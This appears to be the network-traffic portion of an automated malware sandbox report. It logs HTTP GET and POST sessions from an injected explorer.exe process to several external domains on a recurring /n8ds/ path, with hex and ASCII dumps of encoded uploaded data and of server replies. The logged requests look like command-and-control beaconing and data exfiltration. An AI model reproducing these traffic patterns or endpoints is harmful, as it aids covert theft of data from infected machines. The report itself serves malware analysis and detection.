AgV9H1iIz(-hr4wQ93jwppXRn34K6h_gutBKujmmtLjXbPvQLEz32muU1xxv3GNFhD3PqrXEeIYMsT1uWxyx_Wn5A1wJeX5bdhzBAfJA3kMWU(njPsvtMznfKGPefCenDN0(5zE6UxepcYOcaL90XjjDh8RfpmrcQbSJZXtY26fIl1yZxgMEgrHA8vJ10Mz6fqXLlJTzcCxQ66ynikCD9oOd9iffA8Je7c6EGBZ0k0CwL5Eh1tAJs4xIRDCsEnnMdCBryByemhKJEj2M1qcAKFp1qBNlXFJBiK3rJWY8IgJfNFu8G9rSVfp(HdYkc8PIAlaReYFsRedYqNANYt2yaH7wWYlf6NHjEqO6NdK0s6hGL3JWrqBqkGmAg7uXWs_8TW8FUChzag6sYqwSKsUupymlfb8LERsWT7e~-nqWSke4iGF1XTl7C6XiE3_HazdMW8PlMUnr3vwFti4hSfZMUUVjdin(XShUOggMdwsDt6Io1ZcqDfGDF(URno5sroECcSxC2XxDh5iemJvZm8H~OdTxKuC6vSabRRlShYshm7tNCiQT9(P190AkQMuOQfYrO(aUUaz526nZGGQNHo67Wx-HWfoaGRgVWITN_~EaABwCY1yr9XG~U7ZPZYnxcxCLhfK5cZ22Dbc36jjABSAF5LlY_GRZXp8MDyUwwMDN5RVTu5JJy9sxILpVOpl3bL3nX7RjikUBzu-l7V16EOPmkkZw8(mIXAR(1VJjorSD6Qs5eBj30d9KMSz~uLcOdoxfBXZ0u115zFjIxlWqbZYAwNVGV3i5FpLpXa8F-jNxuqjF6G9fmmdoFpDwDNWa3fwAzQajOcK5E9vlFTuZPcjKgqXKgF25iYF8zsQgAAANuHoDrNJOxkq8uliXGVpPypl96chyTEqVQ9n394fOsfKWFQ19xrwF0NPmiXMXYUMbBdJcaeumdtPSRgJMv~_RhEC7cwQ0-OoNgXDsJ6bjFq6ekPo4-IUjJXrFlvLkKYgG2p94q0noZbhZgnxabPVXwTfXxtGWnq5eW~a4WVCq6UV99jiYnpPHBEfXoATCt~yz0INKeJVnmTEDWov~Bx4LqaIh1hG43jPL72k8BHgtaCNnVzPRqrzdrLVyShZKPiu2vqySMttey2xQBIks8f4djJbhU1AD1Y6QjrWp_U5cc1jRes3CrQHoAn3LKnE5HKRe7bLzPBYlslDduPstjAsPIqGoWCINdejAU0WUlmoGLLKxv53f8sAxH123fr45UFLibmiEk4JEY0SwMl_FdlcJrUv7y29DKPO9ruOFSASoSHXkovoqhRadTUUXAMBip~e3r9CgCKCeBHRXs(enaA-3-Mm5HVlm-Wz9kB2D1GLHaDV8ORnK7LL23L1MW8osn(F6UAm3h(7zUWRVbt5~Eo5EKjrGt8Bo7NQNRf7SxR_g3a9iG9lbPFRzlSFmKlVPKylxQuIH3qkn6wZjdKTvefJLQkX3z06Ndy6GRRwICLD3wyQfO2Vl5yJJKI4McV3j5J_hxTYRNAS12MSA8I7N2avDJdzzsBNjCRgtpR9bdd2R98cY7bOPldvU_XErCpYVbPE31WdZxGBAYe13wgEu4bnxMxEgLdkcTRM30pGyTIs2NH6oBqYwcjq2bT_cCD5(O0Pk2TQVD3vYeSu4p61qnL6v8v1F4HOBAewdJ0IuUqsFglyRbmAJZQ6Xf4tiLy2omW3F9fRBFYfn7ngLyCihEpUirLRHfleyfCUn6N9iL1rggz0OoixtWERGnAooZNY3M06ZXMbszZzbHkdt8qDa74rzDkKeUTxQYMO9kW9K9M98nKGPTrbuO01T4bOShD
                                                                                                                                                    Nov 29, 2021 14:11:38.023906946 CET7941OUTData Raw: 5a 71 44 63 64 49 38 72 30 52 45 56 6c 79 56 41 70 41 46 6c 59 30 41 74 69 77 66 54 6f 66 45 35 77 4c 77 59 72 49 51 47 28 34 52 4b 58 43 67 74 64 74 78 66 4e 78 44 43 46 5a 46 78 31 5a 75 33 38 49 61 74 5a 77 54 6d 6c 30 57 5f 7a 59 4a 70 76 42
                                                                                                                                                    Data Ascii: ZqDcdI8r0REVlyVApAFlY0AtiwfTofE5wLwYrIQG(4RKXCgtdtxfNxDCFZFx1Zu38IatZwTml0W_zYJpvBV6b5vrBtzT2_IHk_ih(uN3ww2z0bejuhhzi7jGH2bJeGTy9S0gDeEVfV~AFjnX(l20bdiHhi9M33fJGQr2zrngSe25lg2S~6pbMweSr5(AcA464tulPtzbIFQFS0pQ6okRB4yH1O~QqIGR3l1Dn8Izu1AlrzJLZyl
                                                                                                                                                    Nov 29, 2021 14:11:38.183142900 CET7944OUTData Raw: 4c 61 42 76 53 36 34 6d 36 58 70 76 47 76 49 54 78 55 74 6c 36 6c 31 62 32 44 53 62 72 32 36 42 46 41 63 4d 47 4c 69 66 71 71 75 52 56 50 71 79 74 6a 38 31 6f 69 76 44 68 4b 79 56 72 41 33 4e 79 71 69 37 4c 62 47 5f 57 4e 38 51 62 43 32 2d 6e 71
                                                                                                                                                    Data Ascii: LaBvS64m6XpvGvITxUtl6l1b2DSbr26BFAcMGLifqquRVPqytj81oivDhKyVrA3Nyqi7LbG_WN8QbC2-nqjDhjDSRiG5I64OB9f4xZMIMUZ7Kv7Aq-p6LWLDKW(KkTGZFS7D3wkSCu9w(UOBYT34ke5r7VflEFWNJtkCvl5V3NH0MBhQQlkHS_V796o_RAcxRGXNXvcJEMFZ2lXXlnJqCp3Yf8xyyFmx1S2-7XzTJfGtlmClgz5
                                                                                                                                                    Nov 29, 2021 14:11:38.183286905 CET7963OUTData Raw: 51 51 4c 49 41 30 57 73 46 76 41 46 5a 77 47 62 38 56 36 51 39 6e 50 52 42 30 41 46 37 53 54 6a 49 4a 6b 66 43 4c 4a 2d 55 48 70 6b 63 64 4c 43 56 64 35 56 32 46 74 43 7e 77 36 77 73 58 54 41 4d 45 64 66 6b 39 74 50 53 43 61 4e 30 30 68 56 65 42
                                                                                                                                                    Data Ascii: QQLIA0WsFvAFZwGb8V6Q9nPRB0AF7STjIJkfCLJ-UHpkcdLCVd5V2FtC~w6wsXTAMEdfk9tPSCaN00hVeBzcJ54WM1VAjQa3YI4tOiZsjtq2ZfrzRaW6k6TnaFnPcBUUKym-zJ16RHiFFMyK7vtxafW7Q35CzLwVRk2DBCc2lBtGA_HhtduXPpo51riIQS4BQr2qyoKGTB9BEXvauTcb9JZjJMHqOcpEWrWDiDkRWbxHwR80x7W
                                                                                                                                                    Nov 29, 2021 14:11:38.183460951 CET7967OUTData Raw: 62 33 64 33 6c 57 6a 43 7e 72 64 5a 75 57 51 67 73 51 52 77 35 34 4c 49 36 45 77 57 75 37 79 66 71 69 32 61 58 50 55 35 54 4c 57 43 54 42 33 77 7a 67 6f 53 66 56 6e 6c 49 30 4d 4e 50 33 28 53 6f 65 79 79 65 58 61 51 73 59 41 6a 75 34 55 38 28 68
                                                                                                                                                    Data Ascii: b3d3lWjC~rdZuWQgsQRw54LI6EwWu7yfqi2aXPU5TLWCTB3wzgoSfVnlI0MNP3(SoeyyeXaQsYAju4U8(hq66dPU3KFcnZmvWq7GFfEssoarWG40(T2VwrpRBHEJ7DeLeHiQwkF2smE8OAKKzUlMAgNrK3NWoyvEHZBYgS(SDPOkUYrv1uXi2OdeP4RuKf8FMXGAdPy60oekUm8vo2jheNQJYfIjvbogUKyOq61owozn7bk9Y3O
                                                                                                                                                    Nov 29, 2021 14:11:38.341865063 CET7973OUTData Raw: 56 55 46 56 6d 4d 63 4e 56 4a 45 62 6b 78 79 6f 74 56 70 4a 75 54 58 44 70 35 42 5f 36 35 7e 35 71 4e 31 2d 38 4c 72 2d 50 37 76 4e 62 31 76 55 61 36 78 48 77 67 77 4f 57 39 71 6a 74 5f 44 56 42 4a 35 75 6a 45 4c 74 6d 4b 6d 30 7e 4c 7e 66 4a 54
                                                                                                                                                    Data Ascii: VUFVmMcNVJEbkxyotVpJuTXDp5B_65~5qN1-8Lr-P7vNb1vUa6xHwgwOW9qjt_DVBJ5ujELtmKm0~L~fJTHQZBwIBIfnaAw9NOF_aCHPqxj_eIz3webXTDtHQLK9bU2Lm-6XAwiAp0PtpR1uEzvgu9zp4AGtAoUBmlisrNYvTGHb4VfXAUYokjSWVDcpS6Cyx-b-MQUPcimsqIOaLPLPEyRfnJN7f8vTmy7ZNlCPWcSSbc1V5LD
                                                                                                                                                    Nov 29, 2021 14:11:38.341988087 CET7981OUTData Raw: 6f 51 41 6c 34 78 77 73 6b 73 4f 57 51 79 4c 64 4f 6a 43 78 4d 6d 6a 58 51 63 6a 65 55 54 6b 32 7a 4e 42 32 4f 5f 30 4d 6f 6c 52 35 45 49 51 79 4c 6f 4b 73 67 73 67 4c 49 4a 71 57 51 4b 6e 57 79 35 78 34 44 32 78 32 34 47 4e 61 52 43 32 58 68 79
                                                                                                                                                    Data Ascii: oQAl4xwsksOWQyLdOjCxMmjXQcjeUTk2zNB2O_0MolR5EIQyLoKsgsgLIJqWQKnWy5x4D2x24GNaRC2XhySojk4c(C~AKeeHNfney_zwooWoBZotd1tKQu2iAY5FmqP6~wrC6IrXJPCQlH(WEK1kBgdLmGlFFwLKFpEwOieNrp2lbk~966U_RC(lwJG4j-lBPXFt6Av0~52Xq5DlLVygDyDQ~HsCQEVH62oq0QFKksIG0DAqjVZ
                                                                                                                                                    Nov 29, 2021 14:11:38.342165947 CET7991OUTData Raw: 38 67 33 46 31 67 56 4a 68 4f 41 6b 6d 51 4e 5a 45 65 41 6d 50 76 74 77 51 4b 50 73 66 65 33 39 6f 38 6d 5a 36 44 71 6f 51 64 43 36 35 42 30 41 59 33 51 54 48 31 65 5f 41 52 77 75 42 5a 66 6e 6c 36 30 65 32 39 44 71 62 75 73 46 5a 50 52 6f 69 6f
                                                                                                                                                    Data Ascii: 8g3F1gVJhOAkmQNZEeAmPvtwQKPsfe39o8mZ6DqoQdC65B0AY3QTH1e_ARwuBZfnl60e29DqbusFZPRoioT3LYX9HGE9eTXhvWWk6mUIkVXl0U(RBc(dPZA1aJ8jrp2pBc6CRloKPJBQks26hUWGx2OzXcaiqUnFKcm3F-Xw0wDj79odhn~l(C5uZB(Zqqr_KyrnKRPiihdeoAu58eCPbQob7OSWjipJ8WYN6_dZdkrpsUICL63
                                                                                                                                                    Nov 29, 2021 14:11:38.342338085 CET7994OUTData Raw: 61 6e 59 30 71 6c 4d 69 6d 47 69 6c 6c 66 35 4f 56 57 32 69 52 6e 4d 50 6a 59 68 79 57 76 33 68 7e 73 75 4a 36 62 59 48 35 58 74 6c 37 53 79 70 33 72 32 34 46 52 38 52 63 38 59 66 4d 63 4b 36 77 46 77 45 50 58 52 54 49 56 54 75 6f 6c 49 4e 49 54
                                                                                                                                                    Data Ascii: anY0qlMimGillf5OVW2iRnMPjYhyWv3h~suJ6bYH5Xtl7Syp3r24FR8Rc8YfMcK6wFwEPXRTIVTuolINITSHhr4-4Rrr~FhuYIb_u2lMHd6iWcW5Rny1wGdkTqtEwWrV6O9vB8dTIwd2fRp9s63WUck26yhjgrW6BOqou8ewbE4znxStNZwxtH3xMXvqdZjsVl8NmX1lwid0cyUD3aWo4o~Ykmy1i_8mQNJ951Jwf0uomWFnUZh
                                                                                                                                                    Nov 29, 2021 14:11:38.342514038 CET7997OUTData Raw: 6c 4a 28 72 35 63 75 62 4b 7a 34 66 43 63 76 74 31 50 4a 5f 30 71 65 30 32 39 4b 63 64 6e 69 4d 7e 4a 69 72 42 68 32 35 7a 62 47 54 31 42 6f 54 66 4a 63 48 63 41 70 76 5a 4d 59 6c 67 4b 77 69 71 43 41 54 43 52 43 6e 57 59 28 54 51 61 4d 70 65 53
                                                                                                                                                    Data Ascii: lJ(r5cubKz4fCcvt1PJ_0qe029KcdniM~JirBh25zbGT1BoTfJcHcApvZMYlgKwiqCATCRCnWY(TQaMpeS7W6yB5K2gbX_QryEk9P8wQJpL3WLVfrR1F53PTvgk1~Mp-zJ20Vpzp9stHe7DWJxJ8KSSrZnWZfFHoOfl22iln6ZZqEH1khRyjp03mNot443gu7PF5axuIrBHf5nYB0f8NMvlOs6WWTtIrfBftlVCQIM3SUG~h(ls
                                                                                                                                                    Nov 29, 2021 14:11:38.342693090 CET8002OUTData Raw: 44 46 45 44 7a 41 6d 53 65 71 5a 33 78 47 4e 72 46 48 4c 4a 75 76 64 33 67 33 38 31 4c 79 54 33 54 35 50 49 53 45 69 6d 32 2d 4a 4b 58 67 77 68 51 4a 54 64 4c 35 35 68 68 6d 44 58 79 66 77 65 43 69 61 39 66 2d 35 55 59 77 36 4d 33 71 55 70 49 30
                                                                                                                                                    Data Ascii: DFEDzAmSeqZ3xGNrFHLJuvd3g381LyT3T5PISEim2-JKXgwhQJTdL55hhmDXyfweCia9f-5UYw6M3qUpI01ZEgi9(PjUNLj0WfJrIyZfq1Xq74rQrIlhJ3S9oNxjiTq65jXSePwDhwdAF5Z4LXv7LyfwWJJ_XdpvFvSgTrIVdOrSMK1HRrHUvHsDXfeMLYAA1V0RRDcRntxdwK2ee7SsKtVZIanoQ71ahlPcCxlpMh7FdnZJFde
                                                                                                                                                    Nov 29, 2021 14:11:38.795996904 CET8060INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:38 GMT
                                                                                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                    Content-Length: 282
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    39192.168.11.204985366.29.140.18580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:40.199002028 CET8061OUTGET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.lopsrental.lease
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:40.430437088 CET8061INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:40 GMT
                                                                                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                    Content-Length: 282
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.11.2049813199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:05.723401070 CET6403OUTGET /n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.effective.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:05.817553043 CET6404INHTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:05 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: parking_session=1e059a01-28a3-026a-59f1-9387c4644468; expires=Mon, 29-Nov-2021 13:22:05 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cQEwmA3wFWXVmWB3EA+VycihaTi1RXPdcnEx6ueo6CfFKKI8I5nvogkab/OQIYyRxzvtAyNfRA+5bWkM5l/SRw==
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    Cache-Control: no-store, must-revalidate
                                                                                                                                                    Cache-Control: post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 35 39 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 51 45 77 6d 41 33 77 46 57 58 56 6d 57 42 33 45 41 2b 56 79 63 69 68 61 54 69 31 52 58 50 64 63 6e 45 78 36 75 65 6f 36 43 66 46 4b 4b 49 38 49 35 6e 76 6f 67 6b 61 62 2f 4f 51 49 59 79 52 78 7a 76 74 41 79 4e 66 52 41 2b 35 62 57 6b 4d 35 6c 2f 53 52 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73
                                                                                                                                                    Data Ascii: 591<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cQEwmA3wFWXVmWB3EA+VycihaTi1RXPdcnEx6ueo6CfFKKI8I5nvogkab/OQIYyRxzvtAyNfRA+5bWkM5l/SRw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross
                                                                                                                                                    Nov 29, 2021 14:07:05.817631960 CET6405INData Raw: 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20
                                                                                                                                                    Data Ascii: origin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMWUwNTlhMDEtMjhhMy0wMjZhLTU5ZjEtOTM4N2M0NjQ0NDY4IiwicGFnZV90aW1lIjoxNjM4MTkxMjI1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5lZmZlY3RpdmUuc3RvcmVcL244ZHNcLz
                                                                                                                                                    Nov 29, 2021 14:07:05.817682981 CET6405INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    40192.168.11.204985434.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:47.234215021 CET8064OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.mummymotors.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.mummymotors.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 31 6a 59 6e 75 6e 61 33 66 6a 68 6a 68 59 45 73 67 77 34 72 68 47 6d 31 55 33 30 42 57 58 73 41 56 61 59 4c 4e 4f 4b 69 28 5a 6b 34 75 50 4f 33 47 4f 79 53 33 71 51 47 70 45 74 78 5a 64 7a 73 55 4e 72 61 49 45 44 39 33 59 64 74 6d 37 45 61 74 47 58 74 58 48 42 52 4d 46 65 68 47 49 6b 37 34 4d 61 77 49 47 73 4f 75 38 42 4a 52 4a 4a 2d 72 4b 5a 75 47 66 47 49 74 46 54 32 6e 77 79 35 30 41 6d 38 7e 48 4d 79 35 43 6b 58 75 4f 62 6c 43 6e 44 37 69 69 70 5f 51 30 77 48 4d 44 69 6b 69 31 39 68 7a 49 72 30 62 6a 6c 37 51 35 37 48 6f 44 6d 61 61 72 77 45 6a 72 70 38 6a 34 49 57 6f 6b 52 32 7a 5a 67 4e 6b 67 38 72 55 49 46 43 6f 79 57 44 55 36 4c 4e 37 38 62 38 7e 70 4a 69 50 71 57 6e 31 63 38 4a 53 42 38 68 50 42 74 74 37 4f 42 36 38 41 57 57 79 4f 53 78 54 70 56 4c 4d 53 58 37 49 46 52 6d 6b 51 45 41 73 54 6b 48 43 78 36 4d 4b 6c 6d 4e 4c 74 68 4a 33 4b 6f 45 4d 52 67 55 65 46 75 42 4d 4a 31 70 42 36 76 44 4f 74 73 68 69 63 7a 57 7e 31 6e 49 33 47 70 2d 6f 75 4e 47 55 6a 4d 70 50 4a 70 42 78 72 4c 6b 43 4d 53 6e 43 64 74 65 39 50 7e 6b 53 6a 56 52 77 45 63 7a 34 66 4f 72 6f 70 59 6b 78 62 4e 73 46 43 74 58 47 5a 71 68 41 4f 5a 32 34 43 57 4a 36 50 53 70 46 31 69 39 76 37 4e 72 68 4c 74 5f 63 70 47 4b 53 6d 6a 31 69 36 77 56 79 71 70 64 72 65 68 74 5a 52 44 55 52 4b 63 45 66 70 56 36 6f 69 50 51 6b 59 37 2d 65 2d 4d 77 68 36 35 4b 66 4b 4a 5f 68 57 58 61 6b 54 4a 6d 45 74 54 32 35 70 66 53 57 56 63 51 6d 75 46 51 75 7a 61 51 32 75 56 44 6f 67 67 73 57 4f 42 71 41 6b 55 6b 50 30 6c 36 70 73 33 74 6d 56 4e 4c 34 5f 64 76 66 46 65 4d 38 5a 53 54 50 52 74 5f 30 45 35 74 55 77 76 30 76 45 72 36 78 4a 7e 6c 42 2d 78 7a 6d 42 4f 31 69 62 4a 53 4d 46 32 45 77 38 6b 49 6a 4d 4a 74 6b 2d 39 58 65 38 75 30 52 68 55 6b 54 70 33 42 67 4d 36 79 77 33 53 55 57 36 41 35 52 6c 71 66 47 37 68 41 56 67 43 59 53 52 4b 31 37 4d 7a 35 62 68 50 62 72 62 4e 6e 70 4f 4a 79 61 54 49 56 6c 72 68 41 56 54 66 77 69 4e 37 49 28 72 52 67 7e 54 47 76 41 44 75 34 54 56 31 7a 4b 47 38 77 73 4d 33 6f 75 78 77 46 4d 51 68 6c 49 33 49 66 79 4f 55 54 63 5f 4a 45 55 49 78 76 69 4d 28 69 54 31 62 2d 49 4c 47 6c 39 44 42 49 76 49 70 45 42 30 67 58 31 42 62 45 4f 6a 46 4f 76 56 54 4e 34 33 38 59 7a 5f 7e 64 52 74 38 6a 67 4e 31 6e 32 62 6f 7a 6e 38 43 41 79 68 73 4e 43 38 43 49 54 71 70 6e 71 33 39 7a 52 65 70 70 31 6a 6f 71 71 36 36 74 67 35 49 52 30 6a 5a 4e 4c 70 4f 57 50 41 71 48 65 7a 7e 67 4c 68 31 35 37 70 6c 58 35 7a 4b 68 54 53 55 65 68 36 65 49 69 72 28 31 43 43 4e 7a 38 6b 37 34 50 49 46 65 6d 5a 46 42 56 50 54 6d 73 70 78 73 6c 67 75 4a 75 59 49 34 35 62 38 6c 43 36 63 74 77 48 54 6d 4d 43 61 32 48 65 45 4a 70 53 73 77 5a 76 53 6d 38 5a 4c 39 64 4e 42 63 6d 6a 78 69 4e 39 6d 32 6f 6e 76 4e 62 53 4f 65 54 64 61 69 46 79 36 4d 49 61 75 43 28 46 64 35 78 5f 47 67 41 42 61 38 36 38 39 59 50 57 66 4a 58 49 77 56 4a 74 39 59 73 45 4f 79 5a 50 6b 63 71 49 36 61 73 34 63 43 79 32 76 6f 63 6a 6c 6f 4f 52 6f 64 54 7a 53 38 61 6f 36 45 67 4c 6b 70 70 68 57 6f 36 2d 59 44 68 42 52 69 75 53 74 55 37 7a 34 4b 78 4d 4a 61 77 35 4d 4e 56 6b 